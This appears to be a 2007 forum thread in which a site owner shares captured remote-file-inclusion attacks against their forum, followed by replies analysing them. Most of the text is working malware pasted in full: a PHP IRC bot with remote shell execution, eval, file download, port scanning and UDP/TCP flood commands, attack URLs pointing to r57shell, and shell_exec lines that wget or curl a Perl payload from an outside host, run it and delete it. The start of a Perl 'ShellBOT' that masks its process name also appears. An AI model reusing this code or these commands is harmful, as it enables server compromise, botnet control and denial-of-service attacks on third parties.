$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
//RESTART
case "restart":
$this->send("QUIT :restart");
fclose($this->conn);
$this->start();
break;
//MAIL
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
//DNS
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
//INFO
case "info":
$this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]");
break;
//COMMAND
case "cmd":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
break;
// SET NICK BASED ON HTTPD SERVER TYPE
case "rndnick":
$this->set_nick();
break;
//SEND A MSG,COMMAND
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
// UHHH, THIS DOES *SOMETHING*
case "php":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
// EXECUTE A COMMAND FROM THE SHELL
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
$this->privmsg($this->config['chan'],"[\2exec\2]: $command");
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
// PORTSCAN SOME SHIT
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
// CHANGE IRC SERVERS
case "ud.server": // .udserver <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]);
}
}
break;
// DOWNLOAD STUFF
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
break;
// QUIT
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out");
break;
// FLOOD UDP
case "udpflood":
if(count($mcmd)>4)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]);
}
break;
// FLOOD TCP
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Floodando $host durante $time segundos com pacotes de $packetsize bytes");
// TRANSL: FLOOD HOST DURATION $time SECONDS WITH PACKETS OF $packetsize BYTES (portuguses again)
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Flood concluido: $env MB enviados / Velocidade media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port.");
}
}
// GO GO GADGET pBot!!!!
$bot = new pBot;
$bot->start();
?>
NEW ATTACK, #2:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Guest : 213.139.211.68 : July 14, 2007, 08:06:28 PM
/forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fwww.krippenverein.de%2Farchiv%2Fimages%2Finc%2F
This topic doesn't exist on this board. - "http://www.krippenverein.de/archiv/images/inc/"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ANOTHER, #3:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
71.29.236.111 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://dvl.by.ru/cmd/r57shell.txt? HTTP/1.1" 404 294
===== malcode:
<?php
/******************************************************************************************************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - скрипт на пхп позволяющий вам выполнять системные команды на сервере через браузер
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
/* Версия: 1.3 (05.03.2006)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* Отдельная благодарность за помощь и идеи: blf, phoenix, virus, NorD и всем чертям из RST/GHC.
/* Если у Вас есть какие-либо идеи по поводу того какие функции следует добавить в скрипт то пишите
/* на rst@void.ru. Все предложения будут рассмотрены.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/******************************************************************************************************/
/* ~~~ Настройки | Options ~~~ */
include("http://dvl.by.ru/box.txt");
///INCLUDE FILE CONTAINS:
/* <?
echo('vulnerable');
shell_exec('cd /tmp;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;curl -O crewcorp.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;fetch http://dvl.by.ru/crewcorp.txt;crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;curl -O box.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;fetch http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
?> */
////MORE- "crewcorp.txt" CONTAINS:
/*#!/usr/bin/perl
#
# ShellBOT by: devil__
# Greetz: Puna, Kelserific
#
# Comandos:
# @oldpack <ip> <bytes> <tempo>;
# @udp <ip> <porta> <tempo>;
# @fullportscan <ip> <porta inicial> <porta final>;
# @conback <ip> <porta>
# @download <url> <arquivo a ser salvo>;
# !estatisticas <on/off>;
# !sair para finalizar o bot;
# !novonick para trocar o nick do bot por um novo aleatorio;
# !entra <canal> <tempo>
# !sai <canal> <tempo>;
# !pacotes <on/off>
# @info
# @xpl <kernel>
# @sendmail <assunto> <remetente> <destinatario> <conteudo>
########## CONFIGURACAO ############
my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];
$servidor='priv8.crewcorp.net' unless $servidor;
my $porta='3121';
my @canais=("#crew");
my @adms=("devil__","kelserific","ITAL0","Puna","wicked");
# Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=3;
my $nick = getnick();
my $ircname = getident2();
my $realname = "windows nt 5.1 build 2600";
#chop (my $realname = `uname -n`);
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.3b';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
return "crew^".int(rand(1000));
}
sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);
my @chars=('a'..'z','A'..'Z','1'..'9');
foreach (1..$length)
{
$randomstring.=$chars[rand @chars];
}
return $randomstring;
}
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"
"Void* is not actually void*" - Best error message EVER!
My method of measuring code quality is to ask myself if I would rather have herpes or maintain the code in question. In this case I would choose death by herpes. --akatherder
People who work in VB or any variant thereof are not programmers, they are circus chimps throwing feces into an IDE... --chebrock
My dad chased him off with a shotgun, which apparently pissed this guy off so much he felt the need to strip naked, sit in the middle of his front yard, and chop up live kittens with a machete to feed to his pet boa.
|
|
-
-
Daniel15
  - Joined on 01-27-2007
- Melbourne, Australia
- Posts 213
|
Re: Weird injection attempts
found this on the web
Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
Looks like he's trying a SMF exploit (he's doing it wrong, though), as Sources/Packages.php is a SMF file. Note that this will never work, accessing a SMF file like Sources/Packages.php directly won't work (it will just show a "hacking attempt..." message), and $sourcedir is always defined in Settings.php (which is always require()d)
|
|
-
-
zzo38
- Joined on 02-10-2008
- Posts 138
|
Re: Weird injection attempts
I know no pages should do that but maybe it was someone who was just trying to test the security of your web-site, I get wrong requests on my web-site sometimes as well and as lonog as it doesn't breach my security it is OK now you can see whether or not it is really secure, and if it isn't secure, fix it. I sometimes get weirder requests than this on my web-site. (Of course, if I would test the security in this way, which I don't do unless I see something that looks like it could easily be exploited, I would instead add a message somewhere that says it is insecure and if the owner of this site can please correct it soon? If it is insecure I would notify the owner! Usually it is secure though, and that is good)
: IF COMPILE ?-GOTO COMPILE-HERE ; IMMEDIATE
: THEN HERE SWAP ! ; IMMEDIATE
: ELSE COMPILE GOTO COMPILE-HERE SWAP HERE SWAP ! ; IMMEDIATE
|
|
Page 1 of 1 (9 items)
|
|
|